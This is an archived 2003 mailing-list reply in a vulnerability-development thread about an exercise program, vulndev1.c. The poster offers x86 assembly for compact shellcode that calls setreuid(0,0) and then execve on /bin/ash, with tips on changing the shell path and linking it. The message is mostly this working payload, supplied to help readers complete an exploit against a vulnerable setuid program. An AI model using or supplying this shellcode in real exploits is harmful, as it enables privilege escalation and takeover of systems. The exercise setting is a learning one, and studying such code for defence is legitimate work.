Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)
From: sin (sin_at_insolence.net)
Date: 05/23/03
- Previous message: sin: "Re: Is this exploitable?"
- In reply to: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 May 2003 11:06:56 -0500 (CDT) To: Jon Erickson <matrix@phiral.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
i havent been really following the thread too much; although i did take a
look at the code (vulndev1.c), anyways if someone is having a problem w/
shellcode here is the asm for a generic sys_setreuid/execve shellcode
thats on the smaller side.
.section .text
.global _s
_s:
xorl %ebx, %ebx
xorl %ecx, %ecx
movb $0x46, %al # sys_setreuid
int $0x80
xorl %eax, %eax
pushl %eax
pushl $0x6873612f # hsa/
pushl $0x6e69622f # nib/
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
xorl %edx, %edx
movb $0xb, %al # sys_execve
int $0x80
ah this calls /bin/ash if you dont have it, change the string and make
sure to pass the -e flag to ld. its small, it comes out to like 20+b or
similar, i cant remember.
if i misread a post, well ignore me
"Once set in motion, the process of questioning could come to but one end,
the erosion of conviction and certitude and collapse into despair" (The
Specter of the Absurd, 1988).
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE+zkcioEcehqzkkpgRAr4cAKC9sThgCtXl3BP+ckajYpdxSTVtJwCdHPiR
9cRbv8KlM4VdSkJHxkHU1jc=
=80gt
-----END PGP SIGNATURE-----
- Previous message: sin: "Re: Is this exploitable?"
- In reply to: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
